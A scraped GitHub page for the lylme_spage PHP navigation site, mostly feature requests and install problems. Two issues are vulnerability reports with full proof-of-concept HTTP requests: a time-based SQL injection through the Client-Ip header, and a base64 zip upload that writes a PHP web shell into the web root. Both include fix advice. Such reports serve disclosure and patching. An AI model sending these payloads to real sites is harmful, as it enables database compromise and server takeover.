lylme / lylme_spage Goto Github PK
View Code? Open in Web Editor NEW六零导航页
Home Page: https://hao.lylme.com/
License: Apache License 2.0
六零导航页
Home Page: https://hao.lylme.com/
License: Apache License 2.0
1.Access http://host/apply/index.php?submit=post via POST method and carry the follw data, the injection point is Client-Ip
field within HTTP Header.
1.根据下图所示构造请求数据包,漏洞存在于 HTTP Header 的
Client-Ip
字段。
POST /apply/index.php?submit=post HTTP/1.1
Host: host
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cookie: PHPSESSID=;XDEBUG_SESSION=PHPSTORM
Client-Ip: 0'>if(1,sleep(10),2)>'
Content-Length: 70
url=http%3A%2F%2Fqq.comcAMMVjjb1OL&name=test&group_id=1&icon=&authcode=
payload: Client-Ip: 0'>if(1,sleep(10),2)>'
2.As shown aboved, the payload can delay response elapsed time by more than 10 seconds
如上图所示,载荷可以使响应时间延迟10s以上。
get_real_ip
function is meant to get an valid real client ip.
get_real_ip
函数的本意是获取一个合法的真实用户的ip地址。
And then, the $userip
will be part of the $sql
variable value which will be execute by $DB->query($sql)
.
然后,
$userip
将成为$sql
变量值的一部分,由$DB->query($sql)
执行。
However, step in the vuln function get_real_ip
, $real_ip
can be passed unrestricted malicious SQL payload by Client-Ip:
field.
但是,在漏洞函数
get_real_ip
中,$real_ip
可以通过Client-Ip:
字段传递不受限制的恶意 SQL 有效载荷。
so the attack payload Client-Ip: 0'>if(1,sleep(10),2)>'
can take effect and executed。
因此攻击载荷
Client-Ip: 0'>if(1,sleep(10),2)>'
能够生效并被执行。
this SQL Vuln Affect latest Version: lylme_spagev1.7.0
这个SQL注入漏洞影响最新版本:六零导航页 v1.7.0
For fix this vuln, Here is my advices:
1.Check if the format of the ip satisfies the ipv4 rfc in get_real_ip
2.Handle the result of ip, like this strip_tags(daddslashes(get_real_ip()));
3.Delete this variable which seems useless
为了修复这个漏洞,我有以下建议:
1.在 get_real_ip 中检查 IP 的格式是否符合 ipv4 rfc 标准
2.像这样处理 ip 的结果 strip_tags(daddslashes(get_real_ip()));
3.删除这个看似无用的变量
希望能支持Docker部署!
如果作者不熟悉Docker,希望告知需求的PHP和MySQL版本(以及其他可能的依赖),我也可以自己写Dockerfile。
打开访问很慢,而且页面存在问题
安装失败
SQL成功41句/失败2句
错误信息:Duplicate entry '3' for key 'PRIMARY'
Incorrect table definition; there can be only one auto column and it must be defined as a key
如果常用导航这里用户能够,自己添加删除编辑导航就完美了,配合用户登录保留数据。
修复版没问题了
设置完端口号后,提示
正在下载Docker镜像...
Error response from daemon: Head "https://registry-1.docker.io/v2/caomingjun/navpage/manifests/latest": dial tcp: lookup registry-1.docker.io on [::1]:53: server misbehaving
终止
访问管理
Warning: session_start(): Cannot start session when headers already sent in /var/www/html/pwd/index.php on line 52
请输入密码登录
然后把分组的框在弄成可以调节透明度的!
我之前用docker部署网站,最后一步添加数据库显示没有权限,于是改成宝塔部署,添加数据库和创立站点后,访问域名却打不开
请问怎么导入浏览器导出的书签?
开启 error_reporting(0);
关闭 error_reporting(0);
关闭时,虽然提示获取成功,但是访问返回404 http://隐藏IP/files/download/20230714062949251.ico
本地收藏的链接多了以后找起来有点麻烦,能否在搜索栏添加一个本地搜索
还有收场,
我是docker版,安装的时候生成了一个文件夹,所有的文件都在这个文件夹里。备份的话,只要把这个文件夹备份了就可以了吧?
另外后面是不是可以增加一个给链接排序的功能?还有设置或者链接批量导入导出?
你好
请问支持那些数据呢,SSL应该怎么写呢
大佬,可以再增加二级分类和描述功能吗?主要是收集的网址久了之后自己都忘了是用来干什么的了。
我看到function.php里面好像可以增加描述模板,而且数据库你好像也预留了这个字段。
腾讯云提示/about/index.html文件有病毒是怎么回事
11111111111111
1.Access http://host/admin/ajax_link.php?submit=update via POST method and carry the follw data, the injection point is file
field within HTTP Body.
Although this is a backend vulnerability, the Pre-Auth chain to upload shell can be implemented in conjunction with #32
POST /lylme_spage-master/admin/ajax_link.php?submit=update HTTP/1.1
Host: host
Connection: close
Cookie: admin_token=ec2a3HYAaqQws10zQfeSJaDeJN1aI2gOnV9BLpaHNYdb2hHPQ9nYkoMzuOuQIokfoyJRVcVNK3aT8JUZXq5WSPqTBQ;
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
file=data://text/plain;base64,UEsDBBQAAAAIALMUSFdQg8x9EgAAABIAAAAFAAAAMS5waHCzsS/IKFAA4sy8tHwNTWt7OwBQSwECFAMUAAAACACzFEhXUIPMfRIAAAASAAAABQAAAAAAAAAAAAAAgAEAAAAAMS5waHBQSwUGAAAAAAEAAQAzAAAANQAAAAAA
2.After submit the request, the shell 1.php will be extracted to the ROOT dir.
The code snippet as shown meant to update system from zip compress package.
Howerver, audit the code depth, found that the extracted $RemoteFile
can passed any malicious data, and then release to ROOT Dir via zipExtract
function directlty.
this Vuln Affect latest Version: lylme_spagev1.7.0
For fix this vuln, Here is my advices:
1.Delete this function point
2.Limit decompression file suffixes
希望能添加个二级目录,分类能清除点。对于链接多的人来说,全部链接都在一个页面有点乱。
对于链接描述,在那些无法显示描述的主题上,能否加个鼠标悬停显示描述的选择,可以做成开关形式。
当然只是个人想法
install/index.php?do=3
我把3改成4,又可以继续了
不然修改或添加分组,调节位置只是在前台调节,在后台链接管理里面,点击会默认跳转到在数据库id为1的那个分组
还有就是/pwd 密码那里 要是有个token放在url中 替换掉登录这个步骤就更完美了。 当然只是建议。这样不用输入密码了,放在自己收藏夹里点进去比较方便。
修改谷歌为第一搜索引擎后 ,图标会默认为百度图标,切换其他搜索再切换回来,谷歌图标就消失了。希望能修复,最喜欢的导航,没有之一了
从老版本升级到新版本的教程
如题
Hello maintainer(s),
I am a security researcher from the Institute of Application Security at TU Braunschweig, Germany. We discovered a (potential) security vulnerability in your project.
We would like to report this vulnerability to you in a responsible and ethical manner.
Therefore, we do not want to disclose any details of the vulnerability publicly until you have had a chance to review and fix it.
Could you please let us know your prefered way of receiving security reports?
You can contact us at [email protected] or by replying to this issue.
Thank you for your attention and cooperation.
输入数据库信息后,点下一步,一直卡在了do=3,进度条只有一半。
看以前的issues,好像是php扩展没装?
第一页的php扩展要求也全符合了。
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.